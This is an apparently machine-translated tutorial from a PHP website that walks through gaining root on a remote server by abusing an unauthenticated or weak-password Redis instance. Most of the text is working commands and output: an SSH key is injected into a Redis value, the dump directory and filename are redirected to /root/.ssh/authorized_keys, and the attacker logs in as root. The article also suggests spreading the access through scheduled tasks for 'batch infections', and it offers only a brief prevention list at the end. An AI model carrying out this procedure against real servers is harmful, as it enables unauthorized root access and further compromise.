This article brings you relevant knowledge about the Redis mining principle. Let’s demonstrate how to use Redis to escalate privileges to obtain the Root user of the remote server, and how to protect it. I hope it will help Everyone is helpful.
Recommended learning: Redis video tutorial
Today we will demonstrate how to obtain the Root user of the remote server through privilege escalation through Redis .
1. First we need some prerequisites
Condition 1: You must first have a Redis, and we must know its port【 Default 6379];
Condition 2: The password for Redis cannot be too complex, or there is no password;
Condition 3: The user who starts Redis must be the most It is better to be a Root user, which is more destructive;
2. Start making trouble
##2.1 Create a pair of secret keys
root@kali:/usr/local/src# ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsaNext, the attack key value is generated through the public key.
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > foo.txtThe content is as follows
root@kali:/tmp/rediskey# cat foo.txt ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kaliThe purpose of adding two newlines before and after here is to prevent the data from being connected together and causing failure problems.
2.2 Configure Key to Redis
root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set bar OKLog in to Redis to check , whether it has been written into Redis.
root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129 192.168.243.129:6379> get bar "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n"
2.3 Replace system files through the Redis saving mechanism
192.168.243.129:6379> config set dir /root/.ssh OK 192.168.243.129:6379> config get dir 1) "dir" 2) "/root/.ssh" 192.168.243.129:6379> config set dbfilename "authorized_keys" OK 192.168.243.129:6379> save OK 192.168.243.129:6379> exitAt this time, we log in to the remote host to see the effect.
root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129 The authenticity of host '192.168.243.129 (192.168.243.129)' can't be established. ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.243.129' (ECDSA) to the list of known hosts. Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64 Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1 root@kali:~#OK, we have successfully escalated our rights here, so let’s take a look at what the exported file is? In fact, it is just the saved file form of Redis. If you are interested, you can open it yourself and have a look. It will not be shown here.
3. How to prevent
This vulnerability is quite powerful. We only have one host permission now, add it to the scheduled task to execute some scripts, and then What about batch infections? Tips for prevention are as follows:- Redis should not listen on dangerous IPs. If so, please add firewall control
- Redis Password restrictions must be increased and cannot be weak passwords;
- Try not to start Redis as the Root user.
The above is the detailed content of Let's talk about the principles of Redis mining (detailed examples). For more information, please follow other related articles on the PHP Chinese website!
Redis vs databases: performance comparisonsMay 14, 2025 am 12:11 AMRedisoutperformstraditionaldatabasesinspeedforread/writeoperationsduetoitsin-memorynature,whiletraditionaldatabasesexcelincomplexqueriesanddataintegrity.1)Redisisidealforreal-timeanalyticsandcaching,offeringphenomenalperformance.2)Traditionaldatabase
When Should I Use Redis Instead of a Traditional Database?May 13, 2025 pm 04:01 PMUseRedisinsteadofatraditionaldatabasewhenyourapplicationrequiresspeedandreal-timedataprocessing,suchasforcaching,sessionmanagement,orreal-timeanalytics.Redisexcelsin:1)Caching,reducingloadonprimarydatabases;2)Sessionmanagement,simplifyingdatahandling
Redis: Beyond SQL - The NoSQL PerspectiveMay 08, 2025 am 12:25 AMRedis goes beyond SQL databases because of its high performance and flexibility. 1) Redis achieves extremely fast read and write speed through memory storage. 2) It supports a variety of data structures, such as lists and collections, suitable for complex data processing. 3) Single-threaded model simplifies development, but high concurrency may become a bottleneck.
Redis: A Comparison to Traditional Database ServersMay 07, 2025 am 12:09 AMRedis is superior to traditional databases in high concurrency and low latency scenarios, but is not suitable for complex queries and transaction processing. 1.Redis uses memory storage, fast read and write speed, suitable for high concurrency and low latency requirements. 2. Traditional databases are based on disk, support complex queries and transaction processing, and have strong data consistency and persistence. 3. Redis is suitable as a supplement or substitute for traditional databases, but it needs to be selected according to specific business needs.
Redis: Introduction to a Powerful In-Memory Data StoreMay 06, 2025 am 12:08 AMRedisisahigh-performancein-memorydatastructurestorethatexcelsinspeedandversatility.1)Itsupportsvariousdatastructureslikestrings,lists,andsets.2)Redisisanin-memorydatabasewithpersistenceoptions,ensuringfastperformanceanddatasafety.3)Itoffersatomicoper
Is Redis Primarily a Database?May 05, 2025 am 12:07 AMRedis is primarily a database, but it is more than just a database. 1. As a database, Redis supports persistence and is suitable for high-performance needs. 2. As a cache, Redis improves application response speed. 3. As a message broker, Redis supports publish-subscribe mode, suitable for real-time communication.
Redis: Database, Server, or Something Else?May 04, 2025 am 12:08 AMRedisisamultifacetedtoolthatservesasadatabase,server,andmore.Itfunctionsasanin-memorydatastructurestore,supportsvariousdatastructures,andcanbeusedasacache,messagebroker,sessionstorage,andfordistributedlocking.
Redis: Unveiling Its Purpose and Key ApplicationsMay 03, 2025 am 12:11 AMRedisisanopen-source,in-memorydatastructurestoreusedasadatabase,cache,andmessagebroker,excellinginspeedandversatility.Itiswidelyusedforcaching,real-timeanalytics,sessionmanagement,andleaderboardsduetoitssupportforvariousdatastructuresandfastdataacces
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
SublimeText3 English version
Recommended: Win version, supports code prompts!
MinGW - Minimalist GNU for Windows
This project is in the process of being migrated to osdn.net/projects/mingw, you can continue to follow us there. MinGW: A native Windows port of the GNU Compiler Collection (GCC), freely distributable import libraries and header files for building native Windows applications; includes extensions to the MSVC runtime to support C99 functionality. All MinGW software can run on 64-bit Windows platforms.
ZendStudio 13.5.1 Mac
Powerful PHP integrated development environment
Zend Studio 13.0.1
Powerful PHP integrated development environment
Notepad++7.3.1
Easy-to-use and free code editor
